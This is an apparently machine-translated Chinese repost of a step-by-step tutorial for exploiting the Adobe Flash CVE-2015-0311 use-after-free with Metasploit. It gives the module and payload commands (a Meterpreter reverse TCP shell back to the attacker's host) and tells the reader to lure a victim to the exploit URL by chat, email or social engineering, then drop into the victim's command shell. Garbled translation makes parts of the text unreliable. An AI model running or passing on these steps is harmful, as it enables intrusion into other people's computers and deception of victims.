(CVE-2015-0311漏洞利用方法)利用Adobe Flash Player的字节数组组件漏洞

该组件利用了Adobe Flash播放器中的一个免费漏洞,当试图解压缩()畸形字节流时,该漏洞发生在字节数组::解压缩ViasiLbValuy方法中。该模块已经在Windows 7 SP1(32位)、IE 8到IE 11以及Flash 16.0.0.287、16.0.0.257和16.0.0.235上进行了测试。
利用目标
Flash 16.0.0.287
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
使用Adobe Flash Player Byte Array利用远程PC通过ZlibVariant解压缩免费使用
现在输入(建议手敲,训练自己的记忆力)  exploit exploit / windows / browser / adobe_flash_uncompress_zlib_uaf
msf exploit (adobe_flash_uncompress_zlib_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_uncompress_zlib_uaf)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (adobe_flash_uncompress_zlib_uaf)>set srvhost 192.168.1.9
msf exploit (adobe_flash_uncompress_zlib_uaf)>set uripath /
msf exploit (adobe_flash_uncompress_zlib_uaf)>exploit  
使用Adobe Flash Player Byte Array利用远程PC通过ZlibVariant解压缩免费使用
现在你应该给你的受害者一个URL http :// 192 。168 。1 。9 :8080
通过聊天或电子邮件或任何社会工程技术将服务器的链接发送给受害者
现在,当受害人打开以下链接HTTP :// 192 。168 。1 。9 :8080,如下图所示会话将被打开
使用Adobe Flash Player Byte Array利用远程PC通过ZlibVariant解压缩免费使用
现在键入session -l以显示受害者打开链接时打开的会话
现在在打开的会话输入sysinfo以获取系统信息,然后键入shell以进入Victims命令提示符。
使用Adobe Flash Player Byte Array利用远程PC通过ZlibVariant解压缩免费使用
转载请注明本文链接: http://www.mayidui.net/t2418.html
游客
登录后才可以回帖,登录 或者 注册